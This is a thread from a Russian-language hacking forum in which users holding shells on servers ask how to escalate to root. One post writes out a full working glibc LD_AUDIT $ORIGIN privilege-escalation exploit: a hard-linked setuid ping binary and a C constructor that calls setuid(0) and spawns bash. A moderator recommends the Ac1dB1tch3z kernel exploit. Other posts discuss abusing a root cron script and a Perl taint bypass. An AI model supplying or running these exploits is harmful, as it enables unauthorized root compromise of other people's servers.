Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Discussion in 'Linux, Freebsd, *nix' started by Obormot, 12 Feb 2007.

  1. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686
    Build Date Aug 14 2012 09:55:08

    А здесь должны быть попроще, можете показать направление куда плыть))?
     
  2. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Ac1dB1tch3z
     
    _________________________
  3. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686
    Build Date Aug 14 2012 09:55:08


    ты уверен что это прорбьет i686?

    [​IMG]
     
    #103 dean999, 1 Oct 2012
    Last edited: 1 Oct 2012
  4. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    mkdir /tmp/dn
    ln /bin/ping /tmp/dn/target
    exec 3< /tmp/dn/target
    ls -l /proc/$$/fd/3
    rm -rf /tmp/dn/
    ls -l /proc/$$/fd/3

    cat > payload.c


    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
    ^D



    gcc -w -fPIC -shared -o /tmp/dn payload.c
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3



    Вот что помогло, всем спасибо!
     
    [email protected] likes this.
  5. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Скомпилировал не правильно, читай код. Хотя уже вижу не важно, глибс уязвим.
     
    _________________________
  6. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    так, подробнее! где ошибка) на будущее будет полезно!
     
  7. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Ты сплоент скомпилил без -m32
     
    _________________________
  8. =>Jakobs<=

    =>Jakobs<= Banned

    Joined:
    3 Mar 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    доброй ночи, есть шелл на сервере под ОС Linux Kernel 2.6.32
    есть возможность пользоваться консолью, возможно ли через консоль повысить права шелла до рута, отпишите что то полезное, ссылки на статьи приветствуются так же
    спасибо
     
  9. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Для начала нужно собрать как можно больше полезной информации по серверу:
    https://gist.github.com/nepohelovski/75ada5413f26498fba4f
     
    _________________________
  10. scedexporsep

    scedexporsep New Member

    Joined:
    29 Jul 2013
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Есть права на редактирование SH скрипта который запускается кроном . Как я понимаю крон запускается под рутом . Подскажите как это использовать ? Думаю добавить пользователя , но смущает процедура добавления пользователя в линуксе . Та же несколько раз спрашивается пароль , как это реализовать в sh скрипте ? Или может стоит добавить пользователя www-data в группу sudo ?

    Я новичок , не судите строго .
     
  11. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Не обязательно. Любой пользователь может добавить задание в крон.

    Очень плохая идея.
     
    _________________________
    dmax0fw likes this.
  12. Valer4ik

    Valer4ik New Member

    Joined:
    25 Jul 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    приветствую, есть шелл, пытаюсь поднать привилегии, но к сожалению ядро относительно свежее. Из уязвимых сервисов, установленных на серве, нашел описание security bypass для перла. Версия подходит.
    Не могу понять "контекст" этой уязвимости, что там за security bypass происходит и можно ли ее как то заюзать для поднятия прав? Может можно шеллкод как нибуть вставить? Подскажит плс

    Perl is prone to a security-bypass weakness that occurs when laundering tainted input.
    Attackers can leverage this issue to bypass security checks in perl applications that rely on TAINT mode protection functionality. This opens such applications up to potential attacks that take advantage of the software's failure to properly sanitize user-supplied input.


    perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'
     
Loading...